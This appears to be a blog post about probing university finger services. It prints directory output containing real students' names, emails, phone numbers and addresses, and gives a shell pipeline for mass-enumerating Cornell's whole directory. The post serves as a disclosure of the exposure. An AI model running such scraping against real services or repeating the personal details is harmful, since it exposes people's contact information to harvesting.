Let’s see what happens when we try to finger various users at various other universities:

[stanford.edu]
> Finger: connect::Connection timed out

[arizona.edu]
“University of Arizona – see ns.arizona.edu/ for online phonebook & email listings”

[asu.edu]
> Finger: connect::Connection refused

[princeton.edu]
> Finger: connect::Connection timed out

[brown.edu]
> Finger: connect::Connection refused

[swarthmore.edu]
> Finger: connect::Connection timed out

[yale.edu]
> Finger: connect::Connection refused

[columbia.edu]
> Finger: connect::Connection refused

[umich.edu]
OpenLDAP Finger Service…
1 exact match found for “ecb”:
“ecb, People”
E-Mail Address:
None registered in this service.
Uniqname:
ecb
Last Modified:
Tue Jul 19 16:15:30 2005
Modified By:
batch update, security

[washington.edu]
> Finger: connect::Connection refused

[duke.edu]
^C

[bu.edu]
There was 1 match to your request.

—————————————-
name: Bouressa, Elizabeth, Christine
index_id: X62965
email to: ecb@bu.edu
—————————————-

[indiana.edu]
> Finger: connect::Connection refused

[purdue.edu]
> Finger: connect::Connection timed out

[georgetown.edu]
> Finger: connect::Connection refused

As a survey, the University of Michegan and Boston University are the only two offenders: the other 13 institutions of higher learning obeyed better computer security protocols and turned off the finger service or blocked it at their edge firewalls. You might be wondering what the finger command is. If you are, finger is a linux/unix command you invoke to retrieve information about the users of a computer system. The format is finger user@system, after which a directory listing for that user is printed.

So, how does a finger command against Cornell University look? Surprisingly different:

[cornell.edu]
Information from Cornell’s Electronic Directory…
————————————————–

Your query returned 18 matches:

Name: Elliott Conrad Back Nickname: elliott
Send Email To: ecb29@cornell.edu
Campus Phone: 607-229-0623
Campus Address: Cascadilla Hall
Local Phone: 607-253-7940
Local Address: 1108 Cascadilla, ITHACA, NY, 14853-2301
Project:

[...]

Name: Emily Christine Berg Nickname:
Send Email To: ecb39@cornell.edu
Campus Phone:
Campus Address:
Local Phone: 607-253-6644
Local Address: 6164 Low Rise #6, ITHACA, NY, 14853-6004
Project:

Your query returned 18 matches.

“Oh wow!”, you think. “Cornell University is so great! I ask it for a directory listing, and it shows me all the possible matches!” Does this make you wonder if it will match e@cornell.edu to all names with the letter “e” in them? It should, because it does. Results are truncated after 2000 entries, but for a computer hacker type like myself, that’s no problem. Just run some commands like:

java CombinationGenerator 1 | gawk “{print $0\”@cornell.edu\”}” | xargs finger > cornell-dir-one-comb.txt
java CombinationGenerator 2 | gawk “{print $0\”@cornell.edu\”}” | xargs finger > cornell-dir-two-comb.txt
java CombinationGenerator 3 | gawk “{print $0\”@cornell.edu\”}” | xargs finger > cornell-dir-three-comb.txt

And you will soon find yourself with the directory listings for every student, organization, and entity at Cornell University. Taken one-by-one, this kind of directory information is completely useless and publicly available. But when taken in aggregate form, the contact information in Cornell’s directory *is* a secret, and should not be available this way.

Update: Interestingly, Cornell was aware of this attack about a year before I made my post. Yet, they did nothing to mitigate it…